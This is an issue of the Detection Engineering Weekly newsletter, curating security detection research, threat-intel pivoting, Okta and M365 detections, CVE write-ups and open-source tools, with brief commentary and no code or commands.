Det. Eng. Weekly #48 - I have an idea for a new threat taxonomy
No bro I promise it'll be the last one we'll ever need I promise bro
Welcome to Issue #48 of Detection Engineering Weekly!
10 hours of work so you can have a 10 minute read. Get DEW every Wednesday morning/afternoon. Subscribe now!
This week’s recap:
💎 by Thomas Patzke of the SigmaHQ team on taxonomies
Jared Atkinson’s Part 11 of “On Detection” series, MITRE Engenuity’s LLM TTP extractor, Censys pivoting with Michael Koczwara, Chandler Matthews and Brandon Dossantos from Expel with some detection opportunities in Okta and M365
Some great podcasts on SaaS threat detection and the disastrous CVE ecosystem
Scattered Spider, FCC battles SIM Swappers, CrushFTP crushing it like Sam Altman, and doorbells DDoSing
⏪ Did you miss the previous issues? I'm sure you wouldn't, but JUST in case:
🌐 Newsletter Network:
I want to start highlighting other newsletters in each issue that I find helpful and want to show others. These newsletters may be big or small, professional or personal, security-related or not.
Jake is a fellow newsletter creator, and his OSINT Newsletter is unique. Not only does it combine OSINT tools and news, but it also has all kinds of interactive gems in there, such as geolocation challenges with prizes. Please consider reading his newsletter and subscribing!
💎 Detection Engineering Gem 💎
Beyond One-Size-Fits-All: Sigma’s Approach to Taxonomies by Thomas Patzke
Have you ever had to design a log pipeline with a strategy to implement field names and mapping of those fields, a.k.a. a taxonomy? How about deconflicting field names from several log sources, combining field names, or even worse, trying to keep BOTH values of those field names stored somewhere non-confusing so they aren't clobbered? Shutters in GROK
I love how open the Sigma project is with its decision-making, and Patzke wastes no time showing how hard it is to implement these field standards for an open-source security product. When you implement a format thousands of practitioners use, you opt for flexibility. This allows you to quickly deconflict fields, add new ones, and not introduce pain to others who want to implement your tool differently.
If you are designing something like this for your internal detection program, compare and contrast implementing an open standard to rolling your own: rolling your own is a better option.
🔬 State of the Art
On Detection: Tactical to Functional Part 11: Functional Composition by Jared Atkinson
Jared's Part 11 of his "On Detection" series deeply explores function chains. In previous posts, you could follow a specific technique's function chain by first listing the necessary steps in PowerShell (or Windows-heavy language) and following the API documentation down to the system call. This gave all kinds of interesting detection opportunities - but what do you do when you write the detections? So, Jared lists some of these techniques and shows the API of the functions and how they interconnect with the techniques along the chain. It's a simple but brilliant way to compose a technique into its components.
The MITRE Engenuity folks partnered with the industry to automate TTP extraction in their TRAM project via Large Language Models. The researchers annotated 150 threat reports with thousands of attack techniques to train this model. Think about an open-source version of a GPT that OpenAI recently launched.
Threat Intel-Pivoting using Censys by Michael Koczwara
If you are a researcher, threat hunter, or cyber-curious, you should sign up for a free version of Censys. With information from threat intel reports, Koczwara used the tool to map out net-new infrastructure likely attributed to MuddyWater (Iran-aligned APT). This can bolster your threat detection capabilities if you can accurately fingerprint infrastructure and load it as an enrichment for downstream detections.
By starting with just an IP and port combination, you can go a long way in filtering out false positives (such as legitimate RMM software featured in this post) to other infrastructure. Threat actors are like us: they build and deploy things in a repeatable fashion!
Okta cross-tenant impersonation: a new Expel detection by Chandler Matthews
If you followed the MGM hack timeline, one of the notable findings included a novel persistence mechanism used by ALPHV to stay within MGM's network, specifically around their identity provider, Okta. Matthews talks about how hard it is to reverse-engineer an incident timeline to find novel detection opportunities, and this case was no exception. They talk through the persistence scenario and outline different opportunities to alert on this technique, but with high enough fidelity (but not too precise!) to make it worthwhile.
Suspicious Outlook rules: high-fidelity patterns to watch for by Brandon Dossantos
Expel is coming in hot with detection blog posts this month! A friend of the newsletter, Brandon, gives a detailed breakdown of how to build detections in M365 Outlook. Many threat actors, such as BEC-focused groups, abuse Outlook's mailbox rules to conceal, redirect, and steal contents from a mailbox. The wild part is that the Expel team has triaged actual incidents that focused on BEC-aligned objectives and tried to evade Security detections by creating rules that delete messages related to phishing and other anomalous activity.
🎙️ Detection Engineering Podcasts
Happy to see the DCP podcast return and this episode focuses on the SaaS threat matrix developed by Push Security (and featured on Issue #34). It’s cool to see the hosts compare and contrast this matrix with traditional endpoint detection.
Speaking of SaaS threats, this Soap Box episode from Risky Biz is a great follow-up to the DCP episode listed above. TL;dr e-mail isn’t transient to a breach anymore; it is the breach vector.
I non-ironically want to write that Lorenc is dropping truth-bombs about the CVE ecosystem in this episode. His company, Chainguard, is trying to solve the CVE problem by combining tech with human expertise. One of their products sounds like a Golden-Image-as-a-Service, and it’s a brilliant way to tackle the CVE problem with containers.
☣️ Threat Landscape
Scattered Spider by CISA
I guess it's a badge of honor to be mentioned by CISA. Still, it's nice to see the government organization give a technical breakdown of this year's most notorious threat actor group. It takes a lot of work to collate data from several sources and create an ATT & CK map that reflects their TTPs. For example, the only mention of AWS in this article is the group activating systems manager to do recon, whereas other reports have them using several AWS technologies.
FCC has no webpage for their announcements, only PDFs, TXT files, and Word documents, but I linked the PDF here. Actors like Scattered Spider and members of "the com" actively abuse SIM swapping to target, harass, or infiltrate victim organizations and even crypto accounts.
CrushFTP Critical Vulnerability CVE-2023-43177 Unauthenticated Remote Code Execution by Ryan Emmons and Evan Malamais
The jury is still out on the level of "it's happening" with this vulnerability. But, according to the blog authors, "10,000 public instances and many more behind corporate firewalls" are vulnerable to CVE-2023-43177. There are some fantastic technical details behind the exploit here, so be sure to check it out if you want to see some Java exploit goodness.
When doorbells go rogue! by Alex Grosjean
Let's say you run a massive open-source and paid threat intel list, and firms big and small around the world load your list into their edge devices for blocking and alerting. What would you do if you get legitimate reports of massive abuse from IPs, not VPS providers or bulletproof hosters, but from legitimate residential IPs and small legitimate IP spaces? Read this quote, then go read the blog:
“Alex!! I found it, I found the source of the spam! It was MY DOORBELL!”
CVE-2023-4911 was published by Qualys in early October, and 6 weeks later, CISA added it to its Known Exploitable Vulnerabilities dataset. And, if you haven't checked out the Qualys writeup. In that case, it's a great read for a privilege escalation vulnerability using buffer overflows via clobbering configuration variables, something you don't see a lot with the previous years of priv esc vulnerabilities on Linux.
🔗 Open Source
tram by center-for-threat-informed-defense
Interesting web app by MITRE Engenuity that automatically parses and extracts up to 50 MITRE ATT&CK TTPs from CTI reports. The tool also supports manual labeling of additional TTPs with instructions to retrain the model. Linked above in the “State of the Art” section.
OktaPostExToolkit by xpn
I posted the Okta for Red Teamer's blog from TrustedSec several issues ago but forgot to link their corresponding toolkit. Great post-exploitation tool for Okta where you can intercept all kinds of authentication requests by adding an AD agent.
SigmAIQ by AttackIQ
“SigmAIQ is a wrapper for pySigma and pySigma backends & pipelines.” TL;dr, you can pip install this library, specify a target rule and a backend, and this will take care of the rule conversion for you. It has an interesting LLM module that you can use to ask an LLM of choice to search or create new rules.
awesome-threat-intel-blogs by signalscorps
Yet another awesome-* list of intel blogs. All kinds of stuff in here for primary and secondary research, from DFIR blogs from major vendors, news organizations and individual analysts. The author has a handy spreadsheet of the sources at the end of the README.
BestEdrOfTheMarket by Xacone
A “naive” open-source EDR to help security researchers understand common detection mechanisms of EDRs and develop bypasses. This will be my next lab project for holiday time!